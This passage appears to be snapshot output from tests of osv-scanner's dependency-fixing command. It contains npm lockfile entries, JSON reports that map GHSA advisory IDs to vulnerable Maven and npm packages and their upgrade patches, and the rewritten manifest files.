"sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" }, "json-schema-traverse": { "version": "0.4.1", "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" }, "json-stringify-safe": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" }, "jsprim": { "version": "1.4.2", "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", "requires": { "assert-plus": "1.0.0", "extsprintf": "1.3.0", "json-schema": "0.4.0", "verror": "1.10.0" } }, "mime-db": { "version": "1.52.0", "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==" }, "mime-types": { "version": "2.1.35", "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", "requires": { "mime-db": "1.52.0" } }, "minimatch": { "version": "3.1.5", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.5.tgz", "integrity": "sha512-VgjWUsnnT6n+NUk6eZq77zeFdpW2LWDzP6zFGrCbHXiYNul5Dzqk2HHQ5uFH2DNW5Xbp8+jVzaeNt94ssEEl4w==", "requires": { "brace-expansion": "^1.1.7" } }, "minimist": { "version": "1.2.8", "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==" }, "mkdirp": { "version": "0.5.6", "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz", "integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==", "requires": { "minimist": "^1.2.6" } }, "natives": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/natives/-/natives-1.1.6.tgz", "integrity": "sha512-6+TDFewD4yxY14ptjKaS63GVdtKiES1pTPyxn9Jb0rBqPMZ7VcCiooEhPNsr+mqHtMGxa/5c/HhcC4uPEUw/nA==" }, "normalize-package-data": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/normalize-package-data/-/normalize-package-data-2.5.0.tgz", "integrity": "sha512-/5CMN3T0R4XTj4DcGaexo+roZSdSFW/0AOOTROrjxzCG1wrWXEsGbRKevjlIL+ZDE4sZlJr5ED4YW0yqmkK+eA==", "requires": { "hosted-git-info": "^2.1.4", "resolve": "^1.10.0", "semver": "2 || 3 || 4 || 5", "validate-npm-package-license": "^3.0.1" } }, "npm-package-arg": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/npm-package-arg/-/npm-package-arg-3.1.1.tgz", "integrity": "sha512-jOIv9ddxThaiiI6WH2kLOsUL0vpA1rb7laRZO45OxSzGAj1ouiW0uQLq4zK2LR82pjeBO64VmEHHgUXHkyCQRw==", "requires": { "hosted-git-info": "^1.5.3", "semver": "4" }, "dependencies": { "hosted-git-info": { "version": "1.6.0", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-1.6.0.tgz", "integrity": "sha512-hX2w5jrEx2C64DRfLMb5OKHrZ8ReEkssfcjmrSHVih7dH1FD/qVn3/DfqLRQme2/CXBgpN/iApgAhpdaY+rCRQ==" } } }, "npm-registry-client": { "version": "6.2.0", "resolved": "https://registry.npmjs.org/npm-registry-client/-/npm-registry-client-6.2.0.tgz", "integrity": "sha512-zFrsY9IAR3prA7lwKBWZXi/SdxPBbAQXFqQsbgGZXzECUda/8jVW2x3EfD+2h70o/PGio4K6rYvC/A/IoT1IOA==", "requires": { "chownr": "0", "concat-stream": "^1.4.6", "graceful-fs": "^3.0.0", "mkdirp": "^0.5.0", "normalize-package-data": "~1.0.1 || ^2.0.0", "npm-package-arg": "^3.0.0", "npmlog": "", "once": "^1.3.0", "request": "^2.47.0", "retry": "^0.6.1", "rimraf": "2", "semver": "2 >=2.2.1 || 3.x || 4", "slide": "^1.1.3" } }, "npmlog": { "version": "7.0.1", "resolved": "https://registry.npmjs.org/npmlog/-/npmlog-7.0.1.tgz", "integrity": "sha512-uJ0YFk/mCQpLBt+bxN88AKd+gyqZvZDbtiNxk6Waqcj2aPRyfVx8ITawkyQynxUagInjdYT1+qj4NfA5KJJUxg==", "optional": true, "requires": { "are-we-there-yet": "^4.0.0", "console-control-strings": "^1.1.0", "gauge": "^5.0.0", "set-blocking": "^2.0.0" } }, "oauth-sign": { "version": "0.9.0", "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==" }, "once": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", "requires": { "wrappy": "1" } }, "path-is-absolute": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==" }, "path-parse": { "version": "1.0.7", "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==" }, "performance-now": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" }, "process-nextick-args": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz", "integrity": "sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag==" }, "psl": { "version": "1.9.0", "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" }, "punycode": { "version": "2.3.1", "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==" }, "qs": { "version": "6.5.3", "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==" }, "readable-stream": { "version": "2.3.8", "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", "requires": { "core-util-is": "~1.0.0", "inherits": "~2.0.3", "isarray": "~1.0.0", "process-nextick-args": "~2.0.0", "safe-buffer": "~5.1.1", "string_decoder": "~1.1.1", "util-deprecate": "~1.0.1" } }, "request": { "version": "2.88.2", "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", "requires": { "aws-sign2": "~0.7.0", "aws4": "^1.8.0", "caseless": "~0.12.0", "combined-stream": "~1.0.6", "extend": "~3.0.2", "forever-agent": "~0.6.1", "form-data": "~2.3.2", "har-validator": "~5.1.3", "http-signature": "~1.2.0", "is-typedarray": "~1.0.0", "isstream": "~0.1.2", "json-stringify-safe": "~5.0.1", "mime-types": "~2.1.19", "oauth-sign": "~0.9.0", "performance-now": "^2.1.0", "qs": "~6.5.2", "safe-buffer": "^5.1.2", "tough-cookie": "~2.5.0", "tunnel-agent": "^0.6.0", "uuid": "^3.3.2" } }, "resolve": { "version": "1.22.8", "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", "requires": { "is-core-module": "^2.13.0", "path-parse": "^1.0.7", "supports-preserve-symlinks-flag": "^1.0.0" } }, "retry": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/retry/-/retry-0.6.1.tgz", "integrity": "sha512-txv1qsctZq8ei9J/uCXgaKKFPjlBB0H2hvtnzw9rjKWFNUFtKh59WprXxpAeAey3/QeWwHdxMFqStPaOAgy+dA==" }, "rimraf": { "version": "2.7.1", "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.7.1.tgz", "integrity": "sha512-uWjbaKIK3T1OSVptzX7Nl6PvQ3qAGtKEtVRjRuazjfL3Bx5eI409VZSqgND+4UNnmzLVdPj9FqFJNPqBZFve4w==", "requires": { "glob": "^7.1.3" } }, "safe-buffer": { "version": "5.1.2", "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" }, "safer-buffer": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" }, "semver": { "version": "4.3.6", "resolved": "https://registry.npmjs.org/semver/-/semver-4.3.6.tgz", "integrity": "sha512-IrpJ+yoG4EOH8DFWuVg+8H1kW1Oaof0Wxe7cPcXW3x9BjkN/eVo54F15LyqemnDIUYskQWr9qvl/RihmSy6+xQ==" }, "set-blocking": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz", "integrity": "sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==", "optional": true }, "signal-exit": { "version": "4.1.0", "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", "optional": true }, "slide": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/slide/-/slide-1.1.6.tgz", "integrity": "sha512-NwrtjCg+lZoqhFU8fOwl4ay2ei8PaqCBOUV3/ektPY9trO1yQ1oXEfmHAhKArUVUr/hOHvy5f6AdP17dCM0zMw==" }, "spdx-correct": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/spdx-correct/-/spdx-correct-3.2.0.tgz", "integrity": "sha512-kN9dJbvnySHULIluDHy32WHRUu3Og7B9sbY7tsFLctQkIqnMh3hErYgdMjTYuqmcXX+lK5T1lnUt3G7zNswmZA==", "requires": { "spdx-expression-parse": "^3.0.0", "spdx-license-ids": "^3.0.0" } }, "spdx-exceptions": { "version": "2.4.0", "resolved": "https://registry.npmjs.org/spdx-exceptions/-/spdx-exceptions-2.4.0.tgz", "integrity": "sha512-hcjppoJ68fhxA/cjbN4T8N6uCUejN8yFw69ttpqtBeCbF3u13n7mb31NB9jKwGTTWWnt9IbRA/mf1FprYS8wfw==" }, "spdx-expression-parse": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/spdx-expression-parse/-/spdx-expression-parse-3.0.1.tgz", "integrity": "sha512-cbqHunsQWnJNE6KhVSMsMeH5H/L9EpymbzqTQ3uLwNCLZ1Q481oWaofqH7nO6V07xlXwY6PhQdQ2IedWx/ZK4Q==", "requires": { "spdx-exceptions": "^2.1.0", "spdx-license-ids": "^3.0.0" } }, "spdx-license-ids": { "version": "3.0.17", "resolved": "https://registry.npmjs.org/spdx-license-ids/-/spdx-license-ids-3.0.17.tgz", "integrity": "sha512-sh8PWc/ftMqAAdFiBu6Fy6JUOYjqDJBJvIhpfDMyHrr0Rbp5liZqd4TjtQ/RgfLjKFZb+LMx5hpml5qOWy0qvg==" }, "sshpk": { "version": "1.18.0", "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.18.0.tgz", "integrity": "sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==", "requires": { "asn1": "~0.2.3", "assert-plus": "^1.0.0", "bcrypt-pbkdf": "^1.0.0", "dashdash": "^1.12.0", "ecc-jsbn": "~0.1.1", "getpass": "^0.1.1", "jsbn": "~0.1.0", "safer-buffer": "^2.0.2", "tweetnacl": "~0.14.0" } }, "string_decoder": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "requires": { "safe-buffer": "~5.1.0" } }, "string-width": { "version": "4.2.3", "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", "optional": true, "requires": { "emoji-regex": "^8.0.0", "is-fullwidth-code-point": "^3.0.0", "strip-ansi": "^6.0.1" } }, "strip-ansi": { "version": "6.0.1", "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", "optional": true, "requires": { "ansi-regex": "^5.0.1" } }, "supports-preserve-symlinks-flag": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==" }, "tough-cookie": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", "requires": { "psl": "^1.1.28", "punycode": "^2.1.1" } }, "tunnel-agent": { "version": "0.6.0", "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", "requires": { "safe-buffer": "^5.0.1" } }, "tweetnacl": { "version": "0.14.5", "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" }, "typedarray": { "version": "0.0.6", "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", "integrity": "sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA==" }, "uri-js": { "version": "4.4.1", "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", "requires": { "punycode": "^2.1.0" } }, "util-deprecate": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==" }, "uuid": { "version": "3.4.0", "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" }, "validate-npm-package-license": { "version": "3.0.4", "resolved": "https://registry.npmjs.org/validate-npm-package-license/-/validate-npm-package-license-3.0.4.tgz", "integrity": "sha512-DpKm2Ui/xN7/HQKCtpZxoRWBhZ9Z0kqtygG8XCgNQ8ZlDnxuQmWhj566j8fN4Cu3/JmbhsDo7fcAJq4s9h27Ew==", "requires": { "spdx-correct": "^3.0.0", "spdx-expression-parse": "^3.0.0" } }, "verror": { "version": "1.10.0", "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", "requires": { "assert-plus": "^1.0.0", "core-util-is": "1.0.2", "extsprintf": "^1.2.0" }, "dependencies": { "core-util-is": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" } } }, "wide-align": { "version": "1.1.5", "resolved": "https://registry.npmjs.org/wide-align/-/wide-align-1.1.5.tgz", "integrity": "sha512-eDMORYaPNZ4sQIuuYPDHdQvf4gyCF9rEEV/yPxGfwPkRodwEgiMUUXTx/dex+Me0wxx53S+NgUHaP7y3MGlDmg==", "optional": true, "requires": { "string-width": "^1.0.2 || 2 || 3 || 4" } }, "wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" } } } --- [TestCommand/fix_non-interactive_json_override_pom.xml - 1] { "path": "/pom.xml", "ecosystem": "Maven", "strategy": "override", "vulnerabilities": [ { "id": "GHSA-2x83-r56g-cv47", "packages": [ { "name": "org.apache.httpcomponents:httpclient", "version": "4.0" } ] }, { "id": "GHSA-78wr-2p64-hpwj", "packages": [ { "name": "commons-io:commons-io", "version": "2.5" } ] }, { "id": "GHSA-7r82-7xv7-xcpj", "packages": [ { "name": "org.apache.httpcomponents:httpclient", "version": "4.0" } ] }, { "id": "GHSA-8vhq-qq4p-grq3", "packages": [ { "name": "org.codehaus.plexus:plexus-utils", "version": "3.0" } ] }, { "id": "GHSA-cfh5-3ghh-wfjx", "packages": [ { "name": "org.apache.httpcomponents:httpclient", "version": "4.0" } ] }, { "id": "GHSA-fmj5-wv96-r2ch", "packages": [ { "name": "org.apache.httpcomponents:httpclient", "version": "4.0" } ] }, { "id": "GHSA-g6ph-x5wf-g337", "packages": [ { "name": "org.codehaus.plexus:plexus-utils", "version": "3.0" } ] }, { "id": "GHSA-gp7f-rwcx-9369", "packages": [ { "name": "org.jsoup:jsoup", "version": "1.14.1" } ] }, { "id": "GHSA-gw85-4gmf-m7rh", "packages": [ { "name": "org.apache.httpcomponents:httpclient", "version": "4.0" } ] }, { "id": "GHSA-gwrp-pvrq-jmwv", "packages": [ { "name": "commons-io:commons-io", "version": "2.5" } ] }, { "id": "GHSA-jcwr-x25h-x5fh", "packages": [ { "name": "org.codehaus.plexus:plexus-utils", "version": "3.0" } ] }, { "id": "GHSA-m72m-mhq2-9p6c", "packages": [ { "name": "org.jsoup:jsoup", "version": "1.14.1" } ] } ], "patches": [ { "packageUpdates": [ { "name": "org.apache.httpcomponents:httpclient", "versionFrom": "4.0", "versionTo": "4.5.13", "transitive": true } ], "fixed": [ { "id": "GHSA-2x83-r56g-cv47", "packages": [ { "name": "org.apache.httpcomponents:httpclient", "version": "4.0" } ] }, { "id": "GHSA-7r82-7xv7-xcpj", "packages": [ { "name": "org.apache.httpcomponents:httpclient", "version": "4.0" } ] }, { "id": "GHSA-cfh5-3ghh-wfjx", "packages": [ { "name": "org.apache.httpcomponents:httpclient", "version": "4.0" } ] }, { "id": "GHSA-fmj5-wv96-r2ch", "packages": [ { "name": "org.apache.httpcomponents:httpclient", "version": "4.0" } ] }, { "id": "GHSA-gw85-4gmf-m7rh", "packages": [ { "name": "org.apache.httpcomponents:httpclient", "version": "4.0" } ] } ] }, { "packageUpdates": [ { "name": "org.codehaus.plexus:plexus-utils", "versionFrom": "3.0", "versionTo": "3.0.24", "transitive": false } ], "fixed": [ { "id": "GHSA-8vhq-qq4p-grq3", "packages": [ { "name": "org.codehaus.plexus:plexus-utils", "version": "3.0" } ] }, { "id": "GHSA-g6ph-x5wf-g337", "packages": [ { "name": "org.codehaus.plexus:plexus-utils", "version": "3.0" } ] }, { "id": "GHSA-jcwr-x25h-x5fh", "packages": [ { "name": "org.codehaus.plexus:plexus-utils", "version": "3.0" } ] } ] }, { "packageUpdates": [ { "name": "commons-io:commons-io", "versionFrom": "2.5", "versionTo": "2.14.0", "transitive": true } ], "fixed": [ { "id": "GHSA-78wr-2p64-hpwj", "packages": [ { "name": "commons-io:commons-io", "version": "2.5" } ] }, { "id": "GHSA-gwrp-pvrq-jmwv", "packages": [ { "name": "commons-io:commons-io", "version": "2.5" } ] } ] }, { "packageUpdates": [ { "name": "org.jsoup:jsoup", "versionFrom": "1.14.1", "versionTo": "1.15.3", "transitive": true } ], "fixed": [ { "id": "GHSA-gp7f-rwcx-9369", "packages": [ { "name": "org.jsoup:jsoup", "version": "1.14.1" } ] }, { "id": "GHSA-m72m-mhq2-9p6c", "packages": [ { "name": "org.jsoup:jsoup", "version": "1.14.1" } ] } ] } ] } --- [TestCommand/fix_non-interactive_json_override_pom.xml - 2] Resolving /pom.xml... Rewriting /pom.xml... --- [TestCommand/fix_non-interactive_json_override_pom.xml - 3] 4.0.0 dev.osv osv-fix 1 4.5.13 commons-io commons-io 2.14.0 org.jsoup jsoup 1.15.3 org.apache.httpcomponents httpclient ${httpclient.version} org.apache.maven.wagon wagon-http 3.0.0 org.codehaus.plexus plexus-utils 3.0.24 --- [TestCommand/fix_non-interactive_json_relax_package.json - 1] { "path": "/package.json", "ecosystem": "npm", "strategy": "relax", "vulnerabilities": [ { "id": "GHSA-43f8-2h32-f4cj", "packages": [ { "name": "hosted-git-info", "version": "1.6.0" } ] }, { "id": "GHSA-6rw7-vpxm-498p", "packages": [ { "name": "qs", "version": "6.5.5" } ], "unactionable": true }, { "id": "GHSA-72xf-g2v4-qvf3", "packages": [ { "name": "tough-cookie", "version": "2.5.0" } ], "unactionable": true }, { "id": "GHSA-c2qf-rxjj-qqgw", "packages": [ { "name": "semver", "version": "4.3.6" } ] }, { "id": "GHSA-c6rq-rjc2-86v2", "packages": [ { "name": "chownr", "version": "0.0.2" } ] }, { "id": "GHSA-fjxv-7rqg-78g4", "packages": [ { "name": "form-data", "version": "2.3.3" } ], "unactionable": true }, { "id": "GHSA-p8p7-x288-28g6", "packages": [ { "name": "request", "version": "2.88.2" } ], "unactionable": true } ], "patches": [ { "packageUpdates": [ { "name": "npm-registry-client", "versionFrom": "6.2.0", "versionTo": "^7.5.0", "transitive": false } ], "fixed": [ { "id": "GHSA-43f8-2h32-f4cj", "packages": [ { "name": "hosted-git-info", "version": "1.6.0" } ] }, { "id": "GHSA-c2qf-rxjj-qqgw", "packages": [ { "name": "semver", "version": "4.3.6" } ] }, { "id": "GHSA-c6rq-rjc2-86v2", "packages": [ { "name": "chownr", "version": "0.0.2" } ] } ] } ] } --- [TestCommand/fix_non-interactive_json_relax_package.json - 2] Resolving /package.json... Rewriting /package.json... --- [TestCommand/fix_non-interactive_json_relax_package.json - 3] { "name": "osv-fix", "version": "1.0.0", "description": "", "main": "index.js", "scripts": { "test": "echo /"Error: no test specified/" && exit 1" }, "author": "", "license": "ISC", "dependencies": { "npm-registry-client": "^7.5.0" } } --- [TestCommand/fix_non-interactive_override_pom.xml - 1] Resolving /pom.xml... Found 12 vulnerabilities matching the filter Can fix 12/12 matching vulnerabilities by overriding 4 dependencies OVERRIDE-PACKAGE: org.apache.httpcomponents:httpclient,4.5.13 OVERRIDE-PACKAGE: org.codehaus.plexus:plexus-utils,3.0.24 OVERRIDE-PACKAGE: commons-io:commons-io,2.14.0 OVERRIDE-PACKAGE: org.jsoup:jsoup,1.15.3 FIXED-VULN-IDS: GHSA-2x83-r56g-cv47,GHSA-78wr-2p64-hpwj,GHSA-7r82-7xv7-xcpj,GHSA-8vhq-qq4p-grq3,GHSA-cfh5-3ghh-wfjx,GHSA-fmj5-wv96-r2ch,GHSA-g6ph-x5wf-g337,GHSA-gp7f-rwcx-9369,GHSA-gw85-4gmf-m7rh,GHSA-gwrp-pvrq-jmwv,GHSA-jcwr-x25h-x5fh,GHSA-m72m-mhq2-9p6c REMAINING-VULNS: 0 UNFIXABLE-VULNS: 0 Rewriting /pom.xml... --- [TestCommand/fix_non-interactive_override_pom.xml - 2] --- [TestCommand/fix_non-interactive_override_pom.xml - 3] 4.0.0 dev.osv osv-fix 1 4.5.13 commons-io commons-io 2.14.0 org.jsoup jsoup 1.15.3 org.apache.httpcomponents httpclient ${httpclient.version} org.apache.maven.wagon wagon-http 3.0.0 org.codehaus.plexus plexus-utils 3.0.24 --- [TestCommand/fix_non-interactive_relax_package.json - 1] Resolving /package.json... Found 7 vulnerabilities matching the filter Can fix 3/7 matching vulnerabilities by changing 1 dependencies UPGRADED-PACKAGE: npm-registry-client,6.2.0,^7.5.0 FIXED-VULN-IDS: GHSA-43f8-2h32-f4cj,GHSA-c2qf-rxjj-qqgw,GHSA-c6rq-rjc2-86v2 REMAINING-VULNS: 4 UNFIXABLE-VULNS: 4 Rewriting /package.json... --- [TestCommand/fix_non-interactive_relax_package.json - 2] --- [TestCommand/fix_non-interactive_relax_package.json - 3] { "name": "osv-fix", "version": "1.0.0", "description": "", "main": "index.js", "scripts": { "test": "echo /"Error: no test specified/" && exit 1" }, "author": "", "license": "ISC", "dependencies": { "npm-registry-client": "^7.5.0" } } --- [TestCommand/fix_non_interactive_in_place_package_lock_json_with_native_data_source - 1] Scanning /package-lock.json... Found 12 vulnerabilities matching the filter Can fix 7/12 matching vulnerabilities by changing 5 dependencies UPGRADED-PACKAGE: minimatch,3.1.2,3.1.5 UPGRADED-PACKAGE: ajv,6.12.6,6.14.0 UPGRADED-PACKAGE: brace-expansion,1.1.11,1.1.12 UPGRADED-PACKAGE: concat-stream,1.5.0,1.6.1 UPGRADED-PACKAGE: hosted-git-info,2.1.4,2.8.9 FIXED-VULN-IDS: GHSA-23c5-xmqv-rm74,GHSA-2g4f-4pwh-qvx6,GHSA-3ppc-4f35-3m26,GHSA-43f8-2h32-f4cj,GHSA-7r86-cg39-jmmj,GHSA-g74r-ffvr-5q9f,GHSA-v6h2-p8h4-qcjw REMAINING-VULNS: 5 UNFIXABLE-VULNS: 7 Rewriting /package-lock.json... --- [TestCommand/fix_non_interactive_in_place_package_lock_json_with_native_data_source - 2] --- [TestCommand/fix_non_interactive_in_place_package_lock_json_with_native_data_source - 3] { "name": "osv-fix", "version": "1.0.0", "lockfileVersion": 2, "requires": true, "packages": { "": { "name": "osv-fix", "version": "1.0.0", "license": "ISC", "dependencies": { "npm-registry-client": "^6.2.0" } }, "node_modules/ajv": { "version": "6.14.0", 